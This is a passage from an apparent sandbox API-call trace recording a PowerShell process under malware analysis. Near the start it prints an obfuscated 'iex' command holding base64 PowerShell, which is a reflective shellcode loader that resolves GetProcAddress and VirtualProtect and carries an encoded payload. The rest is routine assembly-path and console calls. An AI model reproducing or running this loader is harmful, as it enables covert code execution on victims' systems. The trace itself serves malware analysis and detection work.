dHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr") returned 0x7307 [0045.764] GetLastError () returned 0xcb [0045.775] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x7308 [0045.775] GetLastError () returned 0xcb [0045.775] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x631728, nSize=0x7308 | out: lpBuffer="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr") returned 0x7307 [0045.776] GetLastError () returned 0xcb [0045.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.781] GetLastError () returned 0xcb [0045.926] VirtualQuery (in: lpAddress=0x602e224, lpBuffer=0x602f224, dwLength=0x1c | out: lpBuffer=0x602f224*(BaseAddress=0x602e000, AllocationBase=0x56a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0046.098] VirtualQuery (in: lpAddress=0x602df98, lpBuffer=0x602ef98, dwLength=0x1c | out: lpBuffer=0x602ef98*(BaseAddress=0x602d000, AllocationBase=0x56a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0046.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.167] GetLastError () returned 0xcb [0046.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0046.287] GetLastError () returned 0xcb [0046.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0046.294] GetLastError () returned 0xcb [0046.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0046.294] GetLastError () returned 0xcb [0046.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.310] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0046.311] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0046.311] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0046.311] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0046.311] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0046.311] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0046.311] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0046.311] GetLastError () returned 0xcb [0046.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0046.311] GetLastError () returned 0xcb [0046.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0046.312] GetLastError () returned 0xcb [0046.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0046.312] GetLastError () returned 0xcb [0046.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0046.312] GetLastError () returned 0xcb [0046.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50 [0046.312] GetLastError () returned 0xcb [0046.491] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x765b0000 [0046.515] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualProtect") returned 0x765c435f [0046.564] CoCreateGuid (in: pguid=0x602db78 | out: pguid=0x602db78*(Data1=0x8b5cf066, Data2=0x76af, Data3=0x4b3a, Data4=([0]=0x92, [1]=0xfc, [2]=0xda, [3]=0xa1, [4]=0xfe, [5]=0xd, [6]=0xf2, [7]=0x95))) returned 0x0 [0046.647] CoCreateGuid (in: pguid=0x602e130 | out: pguid=0x602e130*(Data1=0xbee6da17, Data2=0xfa93, Data3=0x4275, Data4=([0]=0x8e, [1]=0x76, [2]=0x5a, [3]=0xf, [4]=0x13, [5]=0x6d, [6]=0xb5, [7]=0x68))) returned 0x0 [0046.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.718] GetLastError () returned 0xcb [0046.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.721] GetLastError () returned 0xcb [0046.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.724] GetLastError () returned 0xcb [0046.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.726] GetLastError () returned 0xcb [0046.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.728] GetLastError () returned 0xcb [0046.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.731] GetLastError () returned 0xcb [0046.740] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0046.740] GetLastError () returned 0xcb [0046.740] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x602ea3c | out: lpConsoleScreenBufferInfo=0x602ea3c) returned 1 [0046.740] GetLastError () returned 0xcb [0046.741] GetConsoleOutputCP () returned 0x1b5 [0046.741] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x602ea44, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x602ea44) returned 0 [0046.741] GetLastError () returned 0xcb [0046.741] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0046.741] GetLastError () returned 0xcb [0046.741] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x602ea8c | out: lpMode=0x602ea8c) returned 1 [0046.742] GetLastError () returned 0xcb [0046.744] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0046.744] GetLastError () returned 0xcb [0046.744] GetConsoleMode (in: hConsoleHandle=0x13, lpMode=0x602ea70 | out: lpMode=0x602ea70) returned 1 [0046.744] GetLastError () returned 0xcb [0046.745] WriteConsoleW (in: hConsoleOutput=0x13, lpBuffer=0x310748c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x602ea70, lpReserved=0x0 | out: lpBuffer=0x310748c*, lpNumberOfCharsWritten=0x602ea70*=0x1) returned 1 [0046.745] GetLastError () returned 0xcb [0046.749] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0046.750] GetLastError () returned 0xcb [0046.750] GetConsoleMode (in: hConsoleHandle=0x13, lpMode=0x602ea70 | out: lpMode=0x602ea70) returned 1 [0046.750] GetLastError () returned 0xcb [0046.750] WriteConsoleW (in: hConsoleOutput=0x13, lpBuffer=0x31075dc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x602ea70, lpReserved=0x0 | out: lpBuffer=0x31075dc*, lpNumberOfCharsWritten=0x602ea70*=0x2) returned 1 [0046.750] GetLastError () returned 0xcb [0046.750] CloseHandle (hObject=0x13) returned 1 [0046.750] GetLastError () returned 0xcb [0046.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0046.757] GetLastError () returned 0xcb [0046.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0046.757] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0046.758] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.758] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", 